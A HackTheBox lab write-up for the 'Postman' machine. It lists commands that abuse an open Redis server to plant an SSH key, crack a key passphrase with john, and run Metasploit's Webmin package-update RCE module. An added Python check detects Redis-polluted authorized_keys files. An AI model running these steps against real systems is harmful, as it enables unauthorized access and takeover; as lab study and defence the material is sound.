Postman @ HackTheBox
Postman is a 20-point machine on HackTheBox that involves using Redis to write an SSH key to disk, cracking the password of a private key, and exploiting a Webmin vulnerability with Metasploit.
Notes
Redis:
ssh-keygen
echo -e '\n\n' >> blob.txt
cat redis.pub >> blob.txt
echo -e "\n\n" >> blob.txt

CONFIG SET dir "/var/lib/redis/.ssh"
CONFIG SET dbfilename "authorized_keys"
flushall
exit

cat blob.txt | redis-cli -h postman.htb -x set ssh
redis-cli -h postman.htb save

ssh -i redis redis@postman.htb
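Seen from the defender's side, an authorized_keys file produced by the steps above is a Redis RDB snapshot with a key line embedded in it, so it begins with the RDB magic and carries binary bytes around the key. The check below is an added example, not part of the original notes; the function name and both sample inputs are constructed for illustration.

```python
import re

# An RDB snapshot starts with the magic "REDIS" plus a 4-digit format version.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
# A public key entry, optionally preceded by authorized_keys options.
KEY = re.compile(
    rb"(?:^|[ \t])((?:ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521))"
    rb" [A-Za-z0-9+/]+={0,2})"
)

# Constructed samples (not a real snapshot and not real keys).
SAMPLE_TAINTED = (
    b"REDIS0009\xfe\x00\xfb\x01\x00\x00\x03ssh@\x9d\n\n"
    b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGNvbnN0cnVjdGVkc2FtcGxl x@example\n\n"
    b"\xff\x01\x02\x03\x04\x05\x06\x07\x08"
)
SAMPLE_CLEAN = (
    b"# managed by config management\n"
    b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGNvbnN0cnVjdGVkc2FtcGxl ops@example\n"
)


def inspect_authorized_keys(data: bytes) -> dict:
    """Classify the raw bytes of an authorized_keys file."""
    lines = data.split(b"\n")
    keys = [m.group(1).decode("ascii") for m in map(KEY.search, lines) if m]
    # Non-empty lines that are neither comments nor key entries.
    junk = sum(1 for l in lines
               if l.strip() and not l.lstrip().startswith(b"#") and not KEY.search(l))
    # Control bytes other than tab/LF/CR never belong in this text file.
    binary = any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in data)
    rdb = RDB_MAGIC.match(data) is not None
    return {"rdb_header": rdb, "binary_bytes": binary, "junk_lines": junk,
            "keys": keys, "suspicious": rdb or binary}


if __name__ == "__main__":
    for name, blob in (("tainted", SAMPLE_TAINTED), ("clean", SAMPLE_CLEAN)):
        print(name, inspect_authorized_keys(blob))
```

Run it over the raw bytes of any authorized_keys file owned by a service account, such as the one under /var/lib/redis/.ssh here; a service account that never needed SSH logins should have no such file at all.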
John:
ssh2john.py matt | tee matt.hash
john --wordlist=rockyou.txt matt.hash
Metasploit:
msf: search webmin, use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS postman.htb
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST <ip>
This post is licensed under CC BY 4.0 by the author.